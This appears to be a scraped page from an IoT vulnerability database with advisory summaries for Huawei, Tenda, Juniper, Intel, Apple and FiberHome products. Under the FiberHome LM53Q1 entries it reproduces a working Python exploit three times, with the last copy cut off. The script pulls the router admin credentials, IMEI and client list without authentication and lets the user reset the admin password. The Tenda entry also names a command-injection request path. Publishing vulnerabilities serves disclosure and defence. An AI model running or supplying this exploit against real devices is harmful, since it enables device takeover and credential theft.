VARIoT IoT vulnerabilities database

FusionSphere OpenStack V100R006C00 has an information exposure vulnerability. The software uses hard-coded cryptographic key to encrypt messages between certain components, which significantly increases the possibility that encrypted data may be recovered and results in information exposure. FusionSphere OpenStack Contains an information disclosure vulnerability.Information may be obtained. Huawei FusionSphere OpenStack is a set of cloud platform software for FusionSphere (cloud operating system) of Huawei in China in ICT scenarios. The vulnerability is caused by the program using a hard encryption key to encrypt messages between firmwares

FusionSphere OpenStack with software V100R006C00 and V100R006C10RC2 has two command injection vulnerabilities due to the insufficient input validation on one port. An attacker can exploit the vulnerabilities to gain root privileges by sending some messages with malicious commands. FusionSphere OpenStack Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei FusionSphere OpenStack is a set of cloud platform software for FusionSphere (cloud operating system) of Huawei in China in ICT scenarios

FusionSphere OpenStack with software V100R006C00 and V100R006C10RC2 has two command injection vulnerabilities due to the insufficient input validation on one port. An attacker can exploit the vulnerabilities to gain root privileges by sending some messages with malicious commands. FusionSphere OpenStack The software contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei FusionSphere OpenStack is a set of cloud platform software for FusionSphere (cloud operating system) of Huawei in China in ICT scenarios

The Files APP 7.1.1.309 and earlier versions in some Huawei mobile phones has a brute-force password cracking vulnerability due to the improper design of the Safe key database. An unauthorized attacker could access sensitive database information and may crack users' Safe passwords, leading to information leak. Huawei Smartphone Files An application contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei Files APP is a file management application of the Chinese company Huawei (Huawei)

The GaussDB in FusionSphere OpenStack V100R005C10SPC705 and earlier versions has a buffer overflow vulnerability. An authenticated attacker on the LAN can exploit this vulnerability to execute arbitrary code or cause a denial of service (DoS) condition in the affected system. FusionSphere OpenStack Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Huawei FusionSphere OpenStack is a set of cloud platform software for FusionSphere (cloud operating system) of Huawei in China in ICT scenarios. GaussDB is one of those databases

HiGame with software earlier than 7.3.0 versions, SkyTone with software earlier than 8.1.1 versions have a DoS Vulnerability. An attacker tricks a user into installing a malicious application on the smart phone, the attacker can send malformed packets to the device. Due to the lack of adequate input validation of APPs, which causes the APPs Denial of Service. HiGame and SkyTone Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Both Huawei HiGame and SkyTone are products of the Chinese company Huawei. Huawei HiGame is a mobile game download application. SkyTone is a dedicated Internet application for Huawei mobile phones

Command Injection vulnerability in app_data_center on Shenzhen Tenda Ac9 US_AC9V1.0BR_V15.03.05.14_multi_TD01, Ac9 ac9_kf_V15.03.05.19(6318_)_cn, Ac15 US_AC15V1.0BR_V15.03.05.18_multi_TD01, Ac15 US_AC15V1.0BR_V15.03.05.19_multi_TD01, Ac18 US_AC18V1.0BR_V15.03.05.05_multi_TD01, and Ac18 ac18_kf_V15.03.05.19(6318_)_cn devices allows remote unauthenticated attackers to execute arbitrary OS commands via a crafted cgi-bin/luci/usbeject?dev_name= GET request from the LAN. This occurs because the "sub_A6E8 usbeject_process_entry" function executes a system function with untrusted input. Shenzhen Tenda Ac9 , Ac15 ,and Ac18 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ShenzhenTendaAc9 and other are the wireless router products of Tenda. App_data_center is one of the application data centers. There is a command injection vulnerability in app_data_center in several ShenzhenTenda products. The following versions are affected: Shenzhen Tenda Ac9 US_AC9V1.0BR_V15.03.05.14_multi_TD01 Version, Ac9 ac9_kf_V15.03.05.19(6318_)_cn Version, Ac15 US_AC15V1.0BR_V15.03.05.18_multi_TD01 Version, Ac15 US_AC15V1.0BR_V15.03.05.19_multi_TD01 Version, Ac18 US_AC18V1.0BR_V15.03.05.05_multi_TD01 version, Ac18 ac18_kf_V15.03.05.19(6318_)_cn devices version

Frame replay vulnerability in Wi-Fi subsystem in Intel Dual-Band and Tri-Band Wireless-AC Products allows remote attacker to replay frames via channel-based man-in-the-middle. plural Intel Dual-Band and Tri-Band Wireless-AC The product contains data processing vulnerabilities.Tampering with information and disrupting service operations (DoS) There is a possibility of being put into a state. IntelDualBandWireless-AC3160 and so on are all wireless cards of Intel Corporation of the United States. Wi-Fi is one of the Wi-Fi subsystems. There are security vulnerabilities in the Wi-Fi subsystem in several Intel products

An issue was discovered in certain Apple products. iOS before 10.3.2 is affected. macOS before 10.12.5 is affected. The issue involves the "Security" component. A race condition allows attackers to bypass intended entitlement restrictions for sending XPC messages via a crafted app. Both Apple iOS and macOS Sierra are products of Apple Inc. Apple iOS is an operating system developed for mobile devices; macOS Sierra is a dedicated operating system developed for Mac computers. An attacker could exploit this vulnerability via a native application to send privileged XPC messages

QFX and EX Series switches configured to drop traffic when the MAC move limit is exceeded will forward traffic instead of dropping traffic. This can lead to denials of services or other unintended conditions. Affected releases are Juniper Networks Junos OS: 14.1X53 versions prior to 14.1X53-D40; 15.1X53 versions prior to 15.1X53-D55; 15.1 versions prior to 15.1R7. Juniper Networks Junos OS Contains an exceptional condition checking vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Juniper Junos is prone to a denial-of-service vulnerability. An attacker may exploit this issue to cause denial-of-service conditions. Both Juniper QFX and EX Series switches are switch products of Juniper Networks (Juniper Networks). Junos OS is a set of operating systems running on it

A sustained sequence of different types of normal transit traffic can trigger a high CPU consumption denial of service condition in the Junos OS register and schedule software interrupt handler subsystem when a specific command is issued to the device. This affects one or more threads and conversely one or more running processes running on the system. Once this occurs, the high CPU event(s) affects either or both the forwarding and control plane. As a result of this condition the device can become inaccessible in either or both the control and forwarding plane and stops forwarding traffic until the device is rebooted. The issue will reoccur after reboot upon receiving further transit traffic. Score: 5.7 MEDIUM (CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) For network designs utilizing layer 3 forwarding agents or other ARP through layer 3 technologies, the score is slightly higher. Score: 6.5 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) If the following entry exists in the RE message logs then this may indicate the issue is present. This entry may or may not appear when this issue occurs. /kernel: Expensive timeout(9) function: Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D50; 12.3X48 versions prior to 12.3X48-D30; 12.3R versions prior to 12.3R12-S7; 14.1 versions prior to 14.1R8-S4, 14.1R9; 14.1X53 versions prior to 14.1X53-D30, 14.1X53-D34; 14.2 versions prior to 14.2R8; 15.1 versions prior to 15.1F6, 15.1R3; 15.1X49 versions prior to 15.1X49-D40; 15.1X53 versions prior to 15.1X53-D31, 15.1X53-D33, 15.1X53-D60. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS Contains a resource exhaustion vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Juniper Junos is prone to a denial-of-service vulnerability. Exploiting this issue allows remote attackers to cause a denial-of-service condition due to excessive CPU consumption. The operating system provides a secure programming interface and Junos SDK. A denial of service vulnerability exists in Juniper Junos OS

A specially crafted MPLS packet received or processed by the system, on an interface configured with MPLS, will store information in the system memory. Subsequently, if this stored information is accessed, this may result in a kernel crash leading to a denial of service. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D71; 12.3 versions prior to 12.3R12-S7; 12.3X48 versions prior to 12.3X48-D55; 14.1 versions prior to 14.1R8-S5, 14.1R9; 14.1X53 versions prior to 14.1X53-D45, 14.1X53-D107; 14.2 versions prior to 14.2R7-S7, 14.2R8; 15.1 versions prior to 15.1F5-S8, 15.1F6-S8, 15.1R5-S6, 15.1R6-S3, 15.1R7; 15.1X49 versions prior to 15.1X49-D100; 15.1X53 versions prior to 15.1X53-D65, 15.1X53-D231; 16.1 versions prior to 16.1R3-S6, 16.1R4-S6, 16.1R5; 16.1X65 versions prior to 16.1X65-D45; 16.2 versions prior to 16.2R2-S1, 16.2R3; 17.1 versions prior to 17.1R2-S2, 17.1R3; 17.2 versions prior to 17.2R1-S3, 17.2R2; 17.2X75 versions prior to 17.2X75-D50. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Juniper Junos is prone to a denial-of-service vulnerability. The operating system provides a secure programming interface and Junos SDK

On SRX Series and MX Series devices with a Service PIC with any ALG enabled, a crafted TCP/IP response packet processed through the device results in memory corruption leading to a flowd daemon crash. Sustained crafted response packets lead to repeated crashes of the flowd daemon which results in an extended Denial of Service condition. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D60 on SRX series; 12.3X48 versions prior to 12.3X48-D35 on SRX series; 14.1 versions prior to 14.1R9 on MX series; 14.2 versions prior to 14.2R8 on MX series; 15.1X49 versions prior to 15.1X49-D60 on SRX series; 15.1 versions prior to 15.1R5-S8, 15.1F6-S9, 15.1R6-S4, 15.1R7 on MX series; 16.1 versions prior to 16.1R6 on MX series; 16.2 versions prior to 16.2R3 on MX series; 17.1 versions prior to 17.1R2-S4, 17.1R3 on MX series. No other Juniper Networks products or platforms are affected by this issue. Juniper Networks Junos OS Contains a resource management vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Juniper Junos is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause the daemon(s) to crash, effectively denying service to legitimate users. Junos OS is a set of operating systems running on it

A remote, unauthenticated attacker may be able to execute code by exploiting a use-after-free defect found in older versions of PHP through injection of crafted data via specific PHP URLs within the context of the J-Web process. Affected releases are Juniper Networks Junos OS: 12.1X46 versions prior to 12.1X46-D67; 12.3 versions prior to 12.3R12-S5; 12.3X48 versions prior to 12.3X48-D35; 14.1 versions prior to 14.1R8-S5, 14.1R9; 14.1X53 versions prior to 14.1X53-D44, 14.1X53-D50; 14.2 versions prior to 14.2R7-S7, 14.2R8; 15.1 versions prior to 15.1R3; 15.1X49 versions prior to 15.1X49-D30; 15.1X53 versions prior to 15.1X53-D70. Juniper Networks Junos OS Contains a vulnerability in the use of freed memory.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Juniper Junos is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause a denial-of-service condition. Juniper Junos OS is a set of network operating system of Juniper Networks (Juniper Networks) dedicated to the company's hardware systems. The operating system provides a secure programming interface and Junos SDK

A vulnerability in the Intel Deep Learning Training Tool Beta 1 allows a network attacker to remotely execute code as a local user. The tool supports visual tuning and running deep learning algorithms

Improper Permissions Handling in the Portal on FiberHome LM53Q1 VH519R05C01S38 devices (intended for obtaining information about Internet Usage, Changing Passwords, etc.) allows remote attackers to look for the information without authenticating. The information includes Version of device, Firmware ID, Connected users to device along their MAC Addresses, etc. FiberHome mobile WIFI Device model LM53Q1 Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The FiberHomeLM53Q1 is a portable router device from China FiberHome. There is an information disclosure vulnerability in the Portal in the FiberHomeLM53Q1VH519R05C01S38 version, which is caused by the program not processing the correct permissions. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services via CSRF can result in an unauthorized change of username or password of the administrator of the portal. FiberHome mobile WIFI Device model LM53Q1 Contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any Key To Exit"); elif get_option == "3": change_admin_password() elif get_option == "": print "Good Bye!"; else: print "Goodbye!"; main()

The portal on FiberHome Mobile WIFI Device Model LM53Q1 VH519R05C01S38 uses SOAP based web services in order to interact with the portal. Unauthorized Access to Web Services can result in disclosure of the WLAN key/password. FiberHome mobile WIFI Device model LM53Q1 Contains a permission vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. FiberHomeMobileWIFIDeviceLM53Q1 is a portable router device from China FiberHome. A vulnerability exists in the portal in the FiberHomeMobileWIFIDeviceLM53Q1VH519R05C01S38 release. An attacker could exploit the vulnerability to obtain a WLAN key/password. #!/usr/bin/python # /$$$$$$$$ /$$ /$$ /$$ /$$ /$$$$$$$ /$$ /$$$$$$$$ /$$ /$$ /$$ # | $$_____/|__/| $$ | $$ | $$ | $$__ $$ | $$ | $$_____/ | $$ |__/ | $$ # | $$ /$$| $$$$$$$ /$$$$$$ /$$$$$$ | $$ | $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ | $$ \ $$ /$$$$$$ /$$$$$$/$$$$ /$$$$$$ /$$$$$$ /$$$$$$ | $$ /$$ /$$ /$$$$$$ | $$ /$$$$$$ /$$ /$$$$$$ # | $$$$$ | $$| $$__ $$ /$$__ $$ /$$__ $$| $$$$$$$$ /$$__ $$| $$_ $$_ $$ /$$__ $$ | $$$$$$$/ /$$__ $$| $$_ $$_ $$ /$$__ $$|_ $$_/ /$$__ $$ | $$$$$ | $$ /$$/ /$$__ $$| $$ /$$__ $$| $$|_ $$_/ # | $$__/ | $$| $$ \ $$| $$$$$$$$| $$ \__/| $$__ $$| $$ \ $$| $$ \ $$ \ $$| $$$$$$$$ | $$__ $$| $$$$$$$$| $$ \ $$ \ $$| $$ \ $$ | $$ | $$$$$$$$ | $$__/ \ $$$$/ | $$ \ $$| $$| $$ \ $$| $$ | $$ # | $$ | $$| $$ | $$| $$_____/| $$ | $$ | $$| $$ | $$| $$ | $$ | $$| $$_____/ | $$ \ $$| $$_____/| $$ | $$ | $$| $$ | $$ | $$ /$$| $$_____/ | $$ >$$ $$ | $$ | $$| $$| $$ | $$| $$ | $$ /$$ # | $$ | $$| $$$$$$$/| $$$$$$$| $$ | $$ | $$| $$$$$$/| $$ | $$ | $$| $$$$$$$ | $$ | $$| $$$$$$$| $$ | $$ | $$| $$$$$$/ | $$$$/| $$$$$$$ | $$$$$$$$ /$$/\ $$| $$$$$$$/| $$| $$$$$$/| $$ | $$$$/ # |__/ |__/|_______/ \_______/|__/ |__/ |__/ \______/ |__/ |__/ |__/ \_______/ |__/ |__/ \_______/|__/ |__/ |__/ \______/ \___/ \_______/ |________/|__/ \__/| $$____/ |__/ \______/ |__/ \___/ # | $$ # | $$ # |__/ # Exploit Title: FiberHome MIFI LM53Q1 Multiple Vulnerabilities # Exploit Author: Ibad Shah # Vendor Homepage: www.fiberhome.com # Version: VH519R05C01S38 # Tested on: Linux # Platform : Hardware # CVE : CVE-2017-16885, CVE-2017-16886, CVE-2017-16887 # Greetz : Taimoor Zafar, Jawad Ahmed, Owais Mehtab, Aitezaz Mohsin, ZHC import requests,sys,getopt,socket,struct #Declaring IP as our global variable to probe for Gateway IP of Device global ip #Getting Gateway IP Address def get_default_gateway_linux(): with open("/proc/net/route") as fh: for line in fh: fields = line.strip().split() if fields[1] != '00000000' or not int(fields[3], 16) & 2: continue return socket.inet_ntoa(struct.pack("<L", int(fields[2], 16))) return; ip = get_default_gateway_linux() exploit_title = "=============================================== \n FiberHome Remote Administrator Account Details \n================================================"; #Function to get Device Statistics def get_device_details(): gateway = None hardware = None device_name = None devices_all = '' version = None gateway = None ssid = '' dns1 = None dns2 = None requestStatus = requests.get("http://192.168.8.1/xml_action.cgi?method=get&module=duster&file=status1") api_response = requestStatus.content.replace('\t','').split('\n') for results in api_response: if "<hardware_version>" in results: hardware = results.replace('<hardware_version>','').replace('</hardware_version>','').replace(' ','').replace('\n','') if "<device_name>" in results: device_name = results.replace('<device_name>','').replace('</device_name>','').replace(' ','').replace('\n','') if "<version_num>" in results: version = results.replace('<version_num>','').replace('</version_num>','').replace(' ','').replace('\n','') if "<gateway>" in results: gateway = results.replace('<gateway>','').replace('</gateway>','').replace(' ','').replace('\n','') if "<ssid>" in results: ssid = results.replace('<ssid>','').replace('</ssid>','').replace('\n','') if "<dns1>" in results: dns1 = results.replace('<dns1>','').replace('</dns1>','').replace(' ','').replace('\n','') if "<dns2>" in results: dns2 = results.replace('<dns2>','').replace('</dns2>','').replace(' ','').replace('\n','') if "<IMEI>" in results: imei = results.replace('<IMEI>','').replace('</IMEI>','').replace(' ','').replace('\n','') print "\n==============================================" print "\nHardware Version of Device : "+hardware+"\n" print "\nName of Device : "+device_name+"\n" print "\nSoftware Version of Device : "+version+"\n" print "\nIMEI of Device! : "+imei+"\n" print "\nWiFi SSID of Device : "+ssid+"\n" print "\nGateway of Zong Device : "+gateway+"\n" print "\nDNS Primary of Device : "+dns1+"\n" print "\nDNS Secondary of Device : "+dns2+"\n" print "\n=============================================================================\n"; if "<known_devices_list>" in results: devices_all = results.replace('<known_devices_list>','').replace('</known_devices_list>','').replace('\n','') print "\nConnected Devices to WIFI\n" print devices_all #Function for getting User Account Details to login to Portal def get_user_account_details(): request = requests.get("http://"+ip+"/xml_action.cgi?method=get&module=duster&file=admin") admin_details = request.content.replace('\t','').split('\n') for admin_login_response in admin_details: if "<router_username>" in admin_login_response: username = admin_login_response.replace('<router_username>','').replace('</router_username>','') if "<router_password>" in admin_login_response: password = admin_login_response.replace('<router_password>','').replace('</router_password>','') print "\nUsername of Device Web Application :\n"+username+" " print "Password of Device Web Application :\n"+password+"\n" print "\n=============================================================================\n"; #Function to change Administrator Password def change_admin_password(): set_password = raw_input("\nEnter Password to Change : ") password = str(set_password) xml = "<?xml version='1.0' encoding='UTF-8'?><RGW><management><router_password>"+password+"</router_password></management></RGW>" headers = {'Content-Type': 'application/xml'} change_password_request = requests.post("http://"+ip+"/xml_action.cgi?method=set&module=duster&file=admin", data=xml, headers=headers).text print "Password Changed!" def main(): print exploit_title print "\nSelect Menu For Fetching Details \n \n 1. Get Portal Login & Password. \n 2. Get Other Details. \n 3. Change Admin Password for Device" get_option = raw_input("\n Enter Option : "); option = int(get_option) if get_option == "1": get_user_account_details() raw_input("\n Press Any Key To Exit"); elif get_option == "2": get_device_details() raw_input("\n Press Any 